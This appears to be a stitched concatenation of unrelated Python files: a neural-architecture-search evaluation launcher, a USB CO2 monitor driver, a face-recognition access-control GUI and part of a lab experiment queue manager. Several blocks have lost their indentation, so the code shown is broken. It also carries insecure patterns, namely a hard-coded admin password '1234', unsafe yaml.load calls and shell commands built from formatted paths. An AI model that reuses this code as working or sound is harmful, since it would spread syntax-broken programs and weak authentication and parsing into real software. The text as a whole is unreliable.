parser.add_argument("--gpus", default=None)
parser.add_argument(
    "--cfg-ckpt-rel-path",
    default=None,
    help="The relative path of cfg file to ckpt dir",
)
parser.add_argument("--arch-file", default=None)
parser.add_argument(
    "--arch-file-ckpt-rel-path",
    default=None,
    help="The relative path of arch file to ckpt dir",
)
parser.add_argument("--result-dir", required=True)
parser.add_argument("--single-result-file", default=None)
parser.add_argument(
    "--subset",
    default=False,
    action="store_true",
    help="Only applicable when using derive (nb201)",
)
parser.add_argument(
    "--addi-controller-cfgs",
    default="",
    help="Add controller cfgs by yaml dict, " "Only relevant when using derive (nb201)",
)
parser.add_argument(
    "--iso",
    default=False,
    action="store_true",
    help="Only applicable when using derive (nb201)",
)
# Positional leftovers are checkpoint directories.
args, ckpts = parser.parse_known_args()

if args.gpus:
    GPUs = [int(gpu) for gpu in args.gpus.split(",")]
ckpts = [os.path.abspath(ckpt) for ckpt in ckpts]
def get_arch_files(ckpts, arch_file, rel_path):
    """Resolve the architecture file to use for every checkpoint.

    When `rel_path` is given, each checkpoint dir gets its own arch file at
    that relative path; otherwise the single `arch_file` is shared by all.
    """
    assert arch_file is not None or rel_path is not None, (
        "Use `eval-arch` for Nasbench-301/101, should provide --arch-file or"
        " --arch-file-ckpt-rel-path"
    )
    if rel_path:
        return [os.path.join(ckpt, rel_path) for ckpt in ckpts]
    return [arch_file] * len(ckpts)
# Per-checkpoint arch files; only filled in for eval-arch (nb301/101) below.
arch_files = [None] * len(ckpts)

assert (
    args.cfg_file is not None or args.cfg_ckpt_rel_path is not None
), "Should provide --cfg-file or --cfg-ckpt-rel-path"

# Optional extra controller settings (a YAML dict) merged into derive configs.
if args.addi_controller_cfgs:
    addi_controller_cfgs = yaml.load(StringIO(args.addi_controller_cfgs))
else:
    addi_controller_cfgs = None

if not args.cfg_ckpt_rel_path:
    # Single shared config file for every checkpoint.
    with open(args.cfg_file, "r") as r_f:
        eval_or_derive_cfg = yaml.load(r_f)
    call_derive = False  # call derive or eval_arch
    derive_cfg_file = args.cfg_file
    if eval_or_derive_cfg["search_space_type"] == "nasbench-201":
        call_derive = True
        if addi_controller_cfgs:
            # Write a patched copy of the config including the extra
            # controller settings, and use that for deriving.
            derive_cfg = copy.deepcopy(eval_or_derive_cfg)
            derive_cfg["controller_cfg"].update(addi_controller_cfgs)
            derive_cfg_file = "{}_derive.yaml".format(args.cfg_file.rsplit(".", 1)[0])
            with open(derive_cfg_file, "w") as wf:
                yaml.dump(derive_cfg, wf)
        else:
            derive_cfg = eval_or_derive_cfg
        if args.subset:
            # Derive only the archs listed in the config's text_file (if any).
            if derive_cfg["controller_cfg"]["text_file"]:
                with open(derive_cfg["controller_cfg"]["text_file"], "r") as rf2:
                    arch_num = len(rf2.read().strip().split("\n"))
            else:
                arch_num = 15625 if args.iso else 6466
        else:
            # derive 6466 or 15625
            if not args.iso:
                derive_cfg["controller_cfg"]["text_file"] = os.path.join(
                    _HOME_DIR, "awnas/data/nasbench-201/non-isom.txt"
                )
                arch_num = 6466
            else:
                derive_cfg["controller_cfg"]["text_file"] = os.path.join(
                    _HOME_DIR, "awnas/data/nasbench-201/iso.txt"
                )
                arch_num = 15625
    else:
        arch_num = None  # call eval-arch would not be used (nb301/101)
    cfg_files = [derive_cfg_file] * len(ckpts)
    num_archs = [arch_num] * len(ckpts)
    call_derives = [call_derive] * len(ckpts)
else:
    # Per-checkpoint config files, resolved relative to each checkpoint dir.
    cfg_files = []
    call_derives = []
    num_archs = []
    for ckpt in ckpts:
        cfg_file = os.path.join(ckpt, args.cfg_ckpt_rel_path)
        derive_cfg_file = cfg_file
        arch_num = None
        with open(cfg_file, "r") as r_f:
            eval_or_derive_cfg = yaml.load(r_f)
        call_derive = False  # call derive or eval_arch
        if eval_or_derive_cfg["search_space_type"] == "nasbench-201":
            call_derive = True
            if args.addi_controller_cfgs:
                derive_cfg = copy.deepcopy(eval_or_derive_cfg)
                derive_cfg["controller_cfg"].update(
                    yaml.load(StringIO(args.addi_controller_cfgs))
                )
                derive_cfg_file = "{}_derive.yaml".format(cfg_file.rsplit(".", 1)[0])
                with open(derive_cfg_file, "w") as wf:
                    yaml.dump(derive_cfg, wf)
            else:
                derive_cfg = eval_or_derive_cfg
            if args.subset:
                if derive_cfg["controller_cfg"]["text_file"]:
                    with open(derive_cfg["controller_cfg"]["text_file"], "r") as rf2:
                        arch_num = len(rf2.read().strip().split("\n"))
                else:
                    arch_num = 15625 if args.iso else 6466
            else:
                # derive 6466 or 15625
                if not args.iso:
                    derive_cfg["controller_cfg"]["text_file"] = os.path.join(
                        _HOME_DIR, "awnas/data/nasbench-201/non-isom.txt"
                    )
                    arch_num = 6466
                else:
                    derive_cfg["controller_cfg"]["text_file"] = os.path.join(
                        _HOME_DIR, "awnas/data/nasbench-201/iso.txt"
                    )
                    arch_num = 15625
        cfg_files.append(derive_cfg_file)
        num_archs.append(arch_num)
        call_derives.append(call_derive)

if not all(call_derives):
    # has nb301/101, need call eval-arch
    arch_files = get_arch_files(ckpts, args.arch_file, args.arch_file_ckpt_rel_path)

# ---- result paths ----
if len(ckpts) > 1:
    assert args.single_result_file is None
    common_path = os.path.commonpath(ckpts)
    res_files = [
        os.path.relpath(ckpt, common_path).strip("/") + (".yaml" if call_derive else ".pkl")
        for ckpt, call_derive in zip(ckpts, call_derives)
    ]
else:
    assert args.single_result_file is not None
    res_files = [args.single_result_file]
os.makedirs(args.result_dir, exist_ok=True)
for res_file in res_files:
    if "/" in res_file:
        os.makedirs(
            os.path.join(args.result_dir, res_file.rsplit("/", 1)[0]), exist_ok=True
        )
print("Would save to:", res_files)

# One worker process per GPU; the bounded queue feeds them job tokens.
num_processes = len(GPUs)
queue = multiprocessing.Queue(maxsize=num_processes)
def _worker(p_id, gpu_id, queue):
    """Worker loop: consume job tokens from *queue* and shell out to
    `awnas derive` / `awnas eval-arch` on the assigned GPU until a
    None sentinel is received.

    NOTE(review): reads `args` (argparse namespace) and `subprocess`/`os`
    from the enclosing module scope, which is not visible in this chunk.
    """
    while 1:
        token = queue.get()
        # None is the shutdown sentinel pushed once per worker
        if token is None:
            break
        # ckpt_dir, res_file = token
        cfg_file, ckpt_dir, res_file, num_arch, call_derive, arch_file = token
        out_file = os.path.join(args.result_dir, res_file)
        # Log file sits next to the result file, with a .log suffix
        derive_log = out_file.replace(".yaml", ".log").replace(".pkl", ".log")
        if call_derive:
            # call derive
            cmd = (
                "awnas derive {} --load {} --out-file {} --gpu {} -n {} --test --seed 123 "
                "--runtime-save >{} 2>&1"
            ).format(cfg_file, ckpt_dir, out_file, gpu_id, num_arch, derive_log)
        else:
            # call eval-arch
            cmd = (
                "awnas eval-arch {} {} --load {} --dump-rollouts {} --gpu {} --seed 123 "
                ">{} 2>&1"
            ).format(cfg_file, arch_file, ckpt_dir, out_file, gpu_id, derive_log)
        print("Process #{}: ckpt {}; CMD: {}".format(p_id, ckpt_dir, cmd))
        subprocess.check_call(cmd, shell=True)
    print("Process #{} end".format(p_id))
for p_id in range(num_processes):
p = multiprocessing.Process(target=_worker, args=(p_id, GPUs[p_id], queue))
p.start()
for cfg_file, ckpt, res_file, num_arch, call_derive, arch_file in zip(
cfg_files, ckpts, res_files, num_archs, call_derives, arch_files
):
queue.put((cfg_file, ckpt, res_file, num_arch, call_derive, arch_file))
# close all the workers
for _ in range(num_processes):
queue.put(None)
|
co2meter.py | """ Class for reading data from CO2 monitor.
(c) Vladimir Filimonov, 2016-2018
E-mail: vladimir.a.filimonov@gmail.com
"""
# "hidapi" and the unrelated "hid" package both install a module named
# `hid`; importing the wrong one on Windows fails with an AttributeError
# that mentions "windll". Detect that case and raise an actionable hint.
try:
    import hid
except AttributeError as e:
    # Python 3 exceptions have no ".message" attribute -- inspect str(e)
    if 'windll' in str(e):
        raise ImportError(('Import failed with an error "AttributeError: %s". '
                           "Possibly there's a name conflict. Please check if "
                           'library "hid" is installed and if so - uninstall it, '
                           'keeping only "hidapi".' % str(e)))
    else:
        raise
import datetime as dt
from contextlib import contextmanager
import threading
import time
import os
plt = None # To be imported on demand only
try:
import pandas as pd
except ImportError:
pd = None
# USB identifiers of the supported CO2 monitor device
_CO2MON_HID_VENDOR_ID = 0x04d9
_CO2MON_HID_PRODUCT_ID = 0xa052
# 8-byte key involved in decrypting the data stream (see CO2monitor._decrypt)
_CO2MON_MAGIC_WORD = b'Htemp99e'
# Feature report sent to the device on open; also XOR-ed into each message
_CO2MON_MAGIC_TABLE = (0, 0, 0, 0, 0, 0, 0, 0)
# Byte codes identifying the content of a decrypted message
_CODE_END_MESSAGE = 0x0D
_CODE_CO2 = 0x50
_CODE_TEMPERATURE = 0x42
# Plot colors: RGB tuples or matplotlib shorthand
_COLORS = {'r': (0.86, 0.37, 0.34),
           'g': (0.56, 0.86, 0.34),
           'b': 'b'}
# CO2 thresholds (ppm) used for red/green shading in plot()
CO2_HIGH = 1200
CO2_LOW = 800
#############################################################################
def now():
    """Current local time, truncated to whole seconds."""
    timestamp = dt.datetime.now()
    return timestamp.replace(microsecond=0)
#############################################################################
def list_to_longint(x):
    """Pack a big-endian sequence of byte values into a single integer."""
    result = 0
    for val in x:
        result = (result << 8) + val
    return result
#############################################################################
def longint_to_list(x):
    """Unpack a 64-bit integer into a list of eight big-endian bytes."""
    return [(x >> shift) & 0xFF for shift in range(56, -1, -8)]
#############################################################################
def convert_temperature(val):
    """ Convert temperature from Kelvin (unit of 1/16th K) to Celsius
    """
    kelvin = val * 0.0625  # 1/16 K per unit; exact binary factor
    return kelvin - 273.15
#############################################################################
# Class to operate with CO2 monitor
#############################################################################
class CO2monitor:
    """Interface to a USB CO2 monitor HID device.

    Opens the HID connection on demand (reference-counted), decrypts the
    8-byte message stream, and optionally collects readings continuously
    in a background thread (list of tuples, or pandas.DataFrame when
    pandas is available).
    """
    def __init__(self):
        """ Initialize the CO2monitor object and retrieve basic HID info.
        """
        self._info = {'vendor_id': _CO2MON_HID_VENDOR_ID,
                      'product_id': _CO2MON_HID_PRODUCT_ID}
        self._h = hid.device()
        # Number of requests to open connection
        self._status = 0
        # Nibble-swapped magic word, used in the final decryption step
        self._magic_word = [((w << 4) & 0xFF) | (w >> 4)
                            for w in bytearray(_CO2MON_MAGIC_WORD)]
        self._magic_table = _CO2MON_MAGIC_TABLE
        self._magic_table_int = list_to_longint(_CO2MON_MAGIC_TABLE)
        # Initialisation of continuous monitoring
        if pd is None:
            self._data = []
        else:
            self._data = pd.DataFrame()
        self._keep_monitoring = False
        self._interval = 10
        # Device info
        with self.co2hid():
            self._info['manufacturer'] = self._h.get_manufacturer_string()
            self._info['product_name'] = self._h.get_product_string()
            self._info['serial_no'] = self._h.get_serial_number_string()

    #########################################################################
    def hid_open(self, send_magic_table=True):
        """ Open connection to HID device. If connection is already open,
            then only the counter of requests is incremented (so hid_close()
            knows how many sub-processes keep the HID handle)

            Parameters
            ----------
            send_magic_table : bool
                If True then the internal "magic table" will be sent to
                the device (it is used for decryption)
        """
        if self._status == 0:
            # If connection was not opened before
            self._h.open(self._info['vendor_id'], self._info['product_id'])
            if send_magic_table:
                self._h.send_feature_report(self._magic_table)
        self._status += 1

    def hid_close(self, force=False):
        """ Close connection to HID device. If there were several hid_open()
            attempts then the connection will be closed only after respective
            number of calls to hid_close() method

            Parameters
            ----------
            force : bool
                Force-close of connection irrespectively of the counter of
                open requests
        """
        if force:
            self._status = 0
        elif self._status > 0:
            self._status -= 1
        if self._status == 0:
            self._h.close()

    def hid_read(self):
        """ Read 8-byte string from HID device """
        msg = self._h.read(8)
        return self._decrypt(msg)

    @contextmanager
    def co2hid(self, send_magic_table=True):
        # Context manager guaranteeing hid_close() runs even on error
        self.hid_open(send_magic_table=send_magic_table)
        try:
            yield
        finally:
            self.hid_close()

    #########################################################################
    @property
    def info(self):
        """ Device info """
        return self._info

    @property
    def is_alive(self):
        """ If the device is still connected """
        try:
            with self.co2hid(send_magic_table=True):
                return True
        except Exception:
            # Broad by design: any HID error means "not connected".
            # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
            return False

    #########################################################################
    def _decrypt(self, message):
        """ Decode message received from CO2 monitor.
        """
        # Rearrange message and convert to long int
        msg = list_to_longint([message[i] for i in [2, 4, 0, 7, 1, 6, 5, 3]])
        # XOR with magic_table
        res = msg ^ self._magic_table_int
        # Cyclic shift by 3 to the right
        res = (res >> 3) | ((res << 61) & 0xFFFFFFFFFFFFFFFF)
        # Convert to list
        res = longint_to_list(res)
        # Subtract and convert to uint8
        res = [(r - mw) & 0xFF for r, mw in zip(res, self._magic_word)]
        return res

    @staticmethod
    def decode_message(msg):
        """ Decode value from the decrypted message

            Parameters
            ----------
            msg : list
                Decrypted message retrieved with hid_read() method

            Returns
            -------
            CntR : int
                CO2 concentration in ppm
            Tamb : float
                Temperature in Celsius
        """
        # Expected 3 zeros at the end
        bad_msg = (msg[5] != 0) or (msg[6] != 0) or (msg[7] != 0)
        # End of message should be 0x0D
        bad_msg |= msg[4] != _CODE_END_MESSAGE
        # Check sum: LSB of sum of first 3 bytes
        bad_msg |= (sum(msg[:3]) & 0xFF) != msg[3]
        if bad_msg:
            return None, None
        value = (msg[1] << 8) | msg[2]
        if msg[0] == _CODE_CO2:  # CO2 concentration in ppm
            return int(value), None
        elif msg[0] == _CODE_TEMPERATURE:  # Temperature in Celsius
            return None, convert_temperature(value)
        else:  # Other codes - so far not decoded
            return None, None

    def _read_co2_temp(self, max_requests=50):
        """ Read one pair of values from the device.
            HID device should be open before
        """
        co2, temp = None, None
        # The device interleaves CO2 and temperature messages; keep reading
        # until both have been seen, or max_requests attempts are exhausted.
        for ii in range(max_requests):
            _co2, _temp = self.decode_message(self.hid_read())
            if _co2 is not None:
                co2 = _co2
            if _temp is not None:
                temp = _temp
            if (co2 is not None) and (temp is not None):
                break
        return now(), co2, temp

    #########################################################################
    def read_data_raw(self, max_requests=50):
        # Single (timestamp, co2, temp) tuple; also cached in _last_data
        with self.co2hid(send_magic_table=True):
            vals = self._read_co2_temp(max_requests=max_requests)
            self._last_data = vals
        return vals

    def read_data(self, max_requests=50):
        """ Listen to values from device and retrieve temperature and CO2.

            Parameters
            ----------
            max_requests : int
                Effective timeout: number of attempts after which None is returned

            Returns
            -------
            tuple (timestamp, co2, temperature)
            or
            pandas.DataFrame indexed with timestamp
                Results of measurements
        """
        if self._keep_monitoring:
            # Monitoring thread owns the device: return the latest sample
            if pd is None:
                return self._data[-1]
            else:
                return self._data.iloc[[-1]]
        else:
            vals = self.read_data_raw(max_requests=max_requests)
            # If pandas is available - return pandas.DataFrame
            if pd is not None:
                vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
                                    index=[vals[0]])
            return vals

    #########################################################################
    def _monitoring(self):
        """ Private function for continuous monitoring.
        """
        with self.co2hid(send_magic_table=True):
            while self._keep_monitoring:
                vals = self._read_co2_temp(max_requests=1000)
                if pd is None:
                    self._data.append(vals)
                else:
                    vals = pd.DataFrame({'co2': vals[1], 'temp': vals[2]},
                                        index=[vals[0]])
                    # DataFrame.append() was removed in pandas 2.0 --
                    # pd.concat() is the supported equivalent
                    self._data = pd.concat([self._data, vals])
                time.sleep(self._interval)

    def start_monitoring(self, interval=5):
        """ Start continuous monitoring of the values and collecting them
            in the list / pandas.DataFrame.
            The monitoring is started in a separate thread, so the current
            interpreter session is not blocked.

            Parameters
            ----------
            interval : float
                Interval in seconds between consecutive data reads
        """
        self._interval = interval
        if self._keep_monitoring:
            # If already started then we should not start a new thread
            return
        self._keep_monitoring = True
        t = threading.Thread(target=self._monitoring)
        t.start()

    def stop_monitoring(self):
        """ Stop continuous monitoring
        """
        # The thread exits at its next wake-up after this flag flips
        self._keep_monitoring = False

    #########################################################################
    @property
    def data(self):
        """ All data retrieved with continuous monitoring
        """
        return self._data

    def log_data_to_csv(self, fname):
        """ Log data retrieved with continuous monitoring to CSV file. If the
            file already exists, then it will be appended.
            Note, that the method requires pandas package (so far alternative
            is not implemented).

            Parameters
            ----------
            fname : string
                Filename
        """
        if pd is None:
            raise NotImplementedError('Logging to CSV is implemented '
                                      'using pandas package only (so far)')
        if os.path.isfile(fname):
            # Check the last line to get the timestamp of the last record
            df = pd.read_csv(fname)
            last = pd.Timestamp(df.iloc[-1, 0])
            # Append only new data
            with open(fname, 'a') as f:
                self._data[self._data.index > last].to_csv(f, header=False)
        else:
            self._data.to_csv(fname)
#############################################################################
def read_csv(fname):
    """ Read data from CSV file.

        Parameters
        ----------
        fname : string
            Filename

        Returns
        -------
        pandas.DataFrame indexed by the (parsed) timestamp column
    """
    if pd is None:
        raise NotImplementedError('Reading CSV files is implemented '
                                  'using pandas package only (so far)')
    # parse_dates must be True to parse the index column; the previous
    # value 0 is falsy and left the timestamps as plain strings
    return pd.read_csv(fname, index_col=0, parse_dates=True)
#############################################################################
def plot(data, plot_temp=False, ewma_halflife=30., **kwargs):
    """ Plot recorded data

        Parameters
        ----------
        data : pandas.DataFrame
            Data indexed by timestamps. Should have columns 'co2' and 'temp'
        plot_temp : bool
            If True temperature will be also plotted
        ewma_halflife : float
            If specified (not None) data will be smoothed using EWMA
    """
    global plt
    if plt is None:
        # Import on demand so the module stays usable without matplotlib
        import matplotlib.pyplot as _plt
        plt = _plt
    if pd is None:
        raise NotImplementedError('Plotting is implemented so far '
                                  'using pandas package only')
    import numpy as np  # pd.np alias was removed in pandas 1.0
    # DataFrames
    if (ewma_halflife is not None) and (ewma_halflife > 0):
        # Express half-life in number of samples (seconds / mean sample gap)
        halflife = pd.Timedelta(ewma_halflife, 's') / np.mean(np.diff(data.index))
        # pd.ewma() was removed in pandas 0.23 -- use the .ewm() accessor
        co2 = data.co2.ewm(halflife=halflife, min_periods=0).mean()
        temp = data.temp.ewm(halflife=2 * halflife, min_periods=0).mean()
    else:
        co2 = data.co2
        temp = data.temp
    # Split the series so only high values shade red / low values shade green
    co2_r = co2.copy()
    co2_g = co2.copy()
    co2_r[co2_r <= CO2_HIGH] = np.nan
    co2_g[co2_g >= CO2_LOW] = np.nan
    # Plotting
    ax = kwargs.pop('ax', plt.gca())
    ax.fill_between(co2_r.index, co2_r.values, CO2_HIGH,
                    alpha=0.5, color=_COLORS['r'])
    ax.fill_between(co2_g.index, co2_g.values, CO2_LOW,
                    alpha=0.5, color=_COLORS['g'])
    ax.axhline(CO2_LOW, color=_COLORS['g'], lw=2, ls='--')
    ax.axhline(CO2_HIGH, color=_COLORS['r'], lw=2, ls='--')
    ax.plot(co2.index, co2.values, lw=2, color='k')
    yl = ax.get_ylim()
    ax.set_ylim([min(600, yl[0]), max(1400, yl[1])])
    ax.set_ylabel('CO2 concentration, ppm')
    plt.setp(ax.xaxis.get_majorticklabels(), rotation=0,
             horizontalalignment='center')
    if plot_temp:
        ax2 = ax.twinx()
        ax2.plot(temp.index, temp.values, color=_COLORS['b'])
        ax2.set_ylabel('Temperature, C')
        yl = ax2.get_ylim()
        ax2.set_ylim([min(19, yl[0]), max(23, yl[1])])
        # Axes.grid expects a bool; 'off' is the MATLAB-style string
        ax2.grid(False)
    plt.tight_layout()
#############################################################################
# Entry points
#############################################################################
def start_homekit():
    """Console entry point: launch the HomeKit integration (lazy import)."""
    from .homekit import start_homekit as start
    start()
def start_server():
    """Console entry point: launch the monitoring web server (lazy import)."""
    from .server import start_server as start
    start()
def start_server_homekit():
    """Console entry point: launch server and HomeKit together (lazy import)."""
    from .server import start_server_homekit as start
    start()
|
view.py | import sys
import time
import cv2
import threading
import PySimpleGUI as sg
from viewcontroller import wipe_database, face_detection, register, verify, get_registered
from utils.constants import ACCESS_DENIED, ACCESS_GRANTED, DB_ACCESS_DENIED, TITLE, SUCCESS, FAIL, NO_FACE, DB_ACCESS_GRANTED, KEEP_IN_FRAME, LOGO, CLOSE_APP, WAIT_CLOSE_APP
def init_window():
    ''' define the window layout and return created window'''
    sg.theme('Reddit')
    # Rows: header (logo + title), action buttons, webcam image,
    # status banner ('-TEXT-' is updated by update_detect_label)
    layout = [
        [sg.Image(filename='', key='logo'), sg.Text(TITLE, size=(20, 1), justification='center', font='OpenSans-ExtraBold 34', text_color="#666666")],
        [sg.Button('Register New Person', button_color = ('white', '#6DBCFC'), size=(23, 1), font='OpenSans-Regular 18'),
         sg.Button('Database', button_color = ('white', '#6DBCFC'), size=(23, 1), font='OpenSans-Regular 18'),
         sg.Button('Clear Database', button_color = ('white', '#6DBCFC'), size=(23, 1), font='OpenSans-Regular 18')],
        [sg.Image(filename='', key='image')],
        [sg.Text('', key='-TEXT-', justification='center', background_color='#6DBCFC', size=(42, 1), font='OpenSans-ExtraBold 31')]
    ]
    window = sg.Window('fasecure - Face Recognition', layout, location=(0, 0))
    return window
def update_detect_label(text, bg_color, new_box_color):
    '''Update label whether the face has been recognized

    Writes the status banner text/background and updates the module-level
    box_color used by the webcam loop to draw the detection rectangle.
    '''
    global box_color
    global window
    window['-TEXT-'].update(text)
    window['-TEXT-'].update(background_color=bg_color)
    box_color = new_box_color
def thread_verify(frame, start_x, start_y, end_x, end_y):
    '''Face recognition run on separate thread'''
    global box_color
    # NOTE(review): truthiness check -- a legitimate detection at
    # x == 0 would be treated as "no face"; confirm coordinates are 1-based
    if start_x:
        closest_label, check = verify(frame, start_x, start_y, end_x, end_y)
        if check == "out of frame":
            # Face box touches the frame border: ask the user to re-center
            update_detect_label(KEEP_IN_FRAME, '#F63E3E', (0, 0, 255))
        elif check:
            update_detect_label(ACCESS_GRANTED + closest_label, '#56E87C', (86, 232, 124))
        else:
            update_detect_label(ACCESS_DENIED, '#F63E3E', (0, 0, 255))
    else:
        update_detect_label(ACCESS_DENIED, '#F63E3E', (0, 0, 255))
def fps(frame, prev_frame_time):
    '''Display framerate

    Overlays the instantaneous framerate on *frame* and returns the
    (annotated frame, timestamp to feed back in on the next call).
    '''
    new_frame_time = time.time()
    elapsed = new_frame_time - prev_frame_time
    # Two frames can land within the clock resolution, making elapsed 0;
    # the previous unconditional division raised ZeroDivisionError then.
    framerate = 1 / elapsed if elapsed > 0 else 0
    prev_frame_time = new_frame_time
    framerate = str(int(framerate))
    cv2.putText(frame, framerate, (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 3, (100, 255, 0), 3, cv2.LINE_AA)
    return frame, prev_frame_time
def show_webcam(frame):
    '''Display webcam image

    Resizes the BGR frame to the fixed UI size and pushes it into the
    'image' element as PNG bytes.
    '''
    global window
    frame_resized = cv2.resize(frame, (1010, 570))
    img_bytes = cv2.imencode('.png', frame_resized)[1].tobytes()
    window['image'].update(data=img_bytes)
def main():
    """GUI event loop: webcam capture, periodic face verification, and
    the Register/Database/Clear Database/Exit button handlers.

    Uses module-level globals: window (the PySimpleGUI window), box_color
    (detection box color, updated from the verification thread) and
    password (admin password for database actions).
    """
    global box_color
    global window
    cap = cv2.VideoCapture(0)
    t = 15  # frame counter; verification runs every 10th frame
    set_logo = True
    prev_frame_time = 0
    while True:
        event, values = window.read(timeout=20)
        if set_logo:
            # One-time: load and display the logo in the header
            logo = cv2.imread(LOGO)
            logo_resized = cv2.resize(logo, (225, 200))
            img_bytes = cv2.imencode('.png', logo_resized)[1].tobytes()
            window['logo'].update(data=img_bytes)
            set_logo = False
        _, frame = cap.read()
        h, w = frame.shape[:2]
        start_x, start_y, end_x, end_y, frame = face_detection(frame, h, w, box_color)
        frame, prev_frame_time = fps(frame, prev_frame_time)
        show_webcam(frame)
        if t % 10 == 0:
            # Face recognition
            if start_x:
                try:
                    # Run verification off the GUI thread to keep the UI live
                    _worker = threading.Thread(target=thread_verify, args=(frame, start_x, start_y, end_x, end_y))
                    _worker.start()
                except:
                    # NOTE(review): bare except hides all errors -- consider
                    # narrowing to RuntimeError and logging the exception
                    print("Thread error")
        if event == 'Register New Person':
            if start_x:
                password_dialog = sg.popup_get_text('Password for autenthication required', 'Autenthication', password_char='*')
                if password_dialog == password:
                    print(DB_ACCESS_GRANTED)
                    label = sg.popup_get_text('Name', 'Registration')
                    response = register(frame, start_x, start_y, end_x, end_y, label)
                    if response != 0:
                        print(FAIL)
                else:
                    print(DB_ACCESS_DENIED)
            else:
                print(NO_FACE)
        elif event == 'Database':
            # List all registered names (password-protected)
            password_dialog = sg.popup_get_text('Password for autenthication required', 'Autenthication', password_char='*')
            if password_dialog == password:
                list_names = get_registered()
                print(DB_ACCESS_GRANTED)
                if list_names:
                    for i in list_names:
                        sg.Print(i)
            else:
                print(DB_ACCESS_DENIED)
        elif event == 'Clear Database':
            password_dialog = sg.popup_get_text('Password for autenthication required', 'Autenthication', password_char='*')
            if password_dialog == password:
                print(DB_ACCESS_GRANTED)
                response = wipe_database()
                if response != 0:
                    print(FAIL)
                else:
                    print(SUCCESS)
            else:
                print(DB_ACCESS_DENIED)
        elif event == 'Exit System' or event == sg.WIN_CLOSED:
            print(WAIT_CLOSE_APP)
            time.sleep(2) # wait for face verficiation thread to finish
            print(CLOSE_APP)
            cap.release()
            break
        t += 1
    window.close()
# Module-level state shared by the GUI callbacks above
password = "1234"  # NOTE(review): hard-coded admin password -- move to config/env
box_color = (252, 188, 109)  # BGR color of the detection box; updated on verify
window = init_window()  # created at import time; main() drives its event loop
if __name__ == '__main__':
    main()
    sys.exit(0)
|
experiment_queue.py | #####################################################################
# #
# /experiment_queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
import logging
import os
import platform
import threading
import time
import sys
import shutil
from collections import defaultdict
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
from labscript_utils.ls_zprocess import ProcessTree
process_tree = ProcessTree.instance()
import labscript_utils.h5_lock, h5py
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
from labscript_utils.connections import ConnectionTable
import labscript_utils.properties
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
import blacs.plugins as plugins
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
    """Tree view for the shot queue.

    Supports Delete-key removal of selected shots and drag-and-drop of
    .h5/.hdf5 files. The actual handlers (add_to_queue, delete_selection)
    are injected by QueueManager after construction.
    """
    def __init__(self,*args,**kwargs):
        QTreeView.__init__(self,*args,**kwargs)
        self.header().setStretchLastSection(True)
        self.setAutoScroll(False)
        # Callbacks injected externally; None until QueueManager wires them
        self.add_to_queue = None
        self.delete_selection = None
        self._logger = logging.getLogger('BLACS.QueueManager')
    def keyPressEvent(self,event):
        # Delete key removes the current selection (if a handler is attached)
        if event.key() == Qt.Key_Delete:
            event.accept()
            if self.delete_selection:
                self.delete_selection()
        QTreeView.keyPressEvent(self,event)
    def dragEnterEvent(self, event):
        # Only accept drags carrying file URLs
        if event.mimeData().hasUrls():
            event.accept()
        else:
            event.ignore()
    def dragMoveEvent(self, event):
        if event.mimeData().hasUrls():
            event.setDropAction(Qt.CopyAction)
            event.accept()
        else:
            event.ignore()
    def dropEvent(self, event):
        # Queue every dropped .h5/.hdf5 file via the injected callback
        if event.mimeData().hasUrls():
            event.setDropAction(Qt.CopyAction)
            event.accept()
            for url in event.mimeData().urls():
                path = str(url.toLocalFile())
                if path.endswith('.h5') or path.endswith('.hdf5'):
                    self._logger.info('Acceptable file dropped. Path is %s'%path)
                    if self.add_to_queue:
                        self.add_to_queue(str(path))
                    else:
                        self._logger.info('Dropped file not added to queue because there is no access to the neccessary add_to_queue method')
                else:
                    self._logger.info('Invalid file dropped. Path was %s'%path)
        else:
            event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
    def __init__(self, BLACS, ui):
        """Wire up the queue UI and start the background manager thread.

        BLACS : main application object (connection table, tabs, config)
        ui    : loaded Qt UI object containing the queue widgets
        """
        self._ui = ui
        self.BLACS = BLACS
        self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
        # Manager state flags; always access via the thread-safe properties
        self._manager_running = True
        self._manager_paused = False
        self._manager_repeat = False
        self._manager_repeat_mode = self.REPEAT_ALL
        self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
        self._logger = logging.getLogger('BLACS.QueueManager')
        # Create listview model
        self._model = QStandardItemModel()
        self._create_headers()
        self._ui.treeview.setModel(self._model)
        # Inject callbacks into the treeview (drag-and-drop / Delete key)
        self._ui.treeview.add_to_queue = self.process_request
        self._ui.treeview.delete_selection = self._delete_selected_items
        # set up buttons
        self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
        self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
        self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
        self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
        self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
        self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
        self._ui.queue_push_up.clicked.connect(self._move_up)
        self._ui.queue_push_down.clicked.connect(self._move_down)
        self._ui.queue_push_to_top.clicked.connect(self._move_top)
        self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
        # Set the elision of the status labels:
        elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
        elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
        # Set up repeat mode button menu:
        self.repeat_mode_menu = QMenu(self._ui)
